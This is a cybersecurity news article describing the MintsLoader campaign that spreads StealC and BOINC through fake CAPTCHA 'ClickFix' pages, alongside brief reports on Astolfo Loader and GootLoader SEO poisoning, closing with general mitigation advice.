Cyber security news for all

More

    MintsLoader Deploys StealC Malware and BOINC in Sophisticated Targeted Attacks

    Cybersecurity experts have uncovered a targeted campaign that exploits a PowerShell-based malware loader, MintsLoader, to deliver malicious payloads like the StealC information stealer and a legitimate distributed computing platform, BOINC.

    According to a detailed analysis by cybersecurity firm eSentire, MintsLoader is being propagated through spam emails containing links to KongTuke/ClickFix landing pages or obfuscated JScript files. These campaigns, detected in early January 2025, have been observed targeting the electricity, oil and gas, and legal services sectors across the U.S. and Europe.

    KongTuke and ClickFix Tactics

    The campaign coincides with a surge in malicious operations employing fake CAPTCHA verification pages to lure users into executing PowerShell scripts, bypassing standard security checks. The technique, known as KongTuke or ClickFix, involves manipulated scripts that trick victims into pasting malicious code from their clipboard into a Windows Run command.

    “Palo Alto Networks Unit 42” revealed similar tactics in an attack that distributed BOINC, stating, “KongTuke utilizes fake ‘verify you are human’ prompts to inject malicious PowerShell code into the user’s clipboard while providing explicit instructions for execution.”

    Attack Chain Analysis

    The MintsLoader campaign begins with spam emails linking to downloads of an obfuscated JavaScript file. When executed, the script initiates a PowerShell command using curl to download and launch MintsLoader. It then deletes itself to eliminate forensic evidence.

    Alternative delivery methods include redirecting victims to ClickFix-style pages, prompting them to run MintsLoader via the Windows Run prompt.

    Once active, MintsLoader contacts a command-and-control (C2) server to fetch interim PowerShell payloads. These payloads perform sandbox evasion checks and utilize a Domain Generation Algorithm (DGA), which creates dynamic C2 domains based on the current day.

    The final stage involves deploying StealC, a malware-as-a-service (MaaS) offering that has been active since 2023. Derived from the Arkei malware, StealC avoids infecting machines in Russia, Ukraine, Belarus, Kazakhstan, and Uzbekistan, reflecting deliberate targeting patterns.

    JinxLoader Evolves into Astolfo Loader

    The rise of MintsLoader parallels developments in other malware families, such as the emergence of Astolfo Loader (Jinx V3). Initially known as JinxLoader, this malware was re-engineered in C++ for performance improvements after its source code was sold to two separate buyers: Delfin and AstolfoLoader.

    According to BlackBerry, “While Delfin retains the original Go-compiled JinxLoader V2, AstolfoLoader has opted for a rebranded version in C++, showcasing how malware tools evolve quickly and remain widely accessible on hacking forums.”

    GootLoader: Sophisticated SEO Poisoning

    Further complicating the cybersecurity landscape, GootLoader campaigns continue to weaponize search engine optimization (SEO) poisoning. These attacks redirect victims searching for legal documents to compromised WordPress sites hosting malicious downloads disguised as legitimate files.

    Sophos researchers noted that GootLoader operators dynamically load malicious content from external servers—dubbed the “mothership”—into infected WordPress sites. These operations utilize IP-based geofencing and restrict victim access to once every 24 hours to avoid detection.

    “The obfuscation is so intricate that even site owners are often unaware their WordPress sites have been compromised,” noted security researcher Gabor Szappanos.

    Mitigation and Awareness

    The MintsLoader and GootLoader campaigns underscore the need for heightened vigilance in cybersecurity, particularly in critical industries. Users are urged to avoid executing unverified scripts, scrutinize CAPTCHA pages, and implement strong email filtering to prevent exposure to these evolving threats.

    Recent Articles

    Related Stories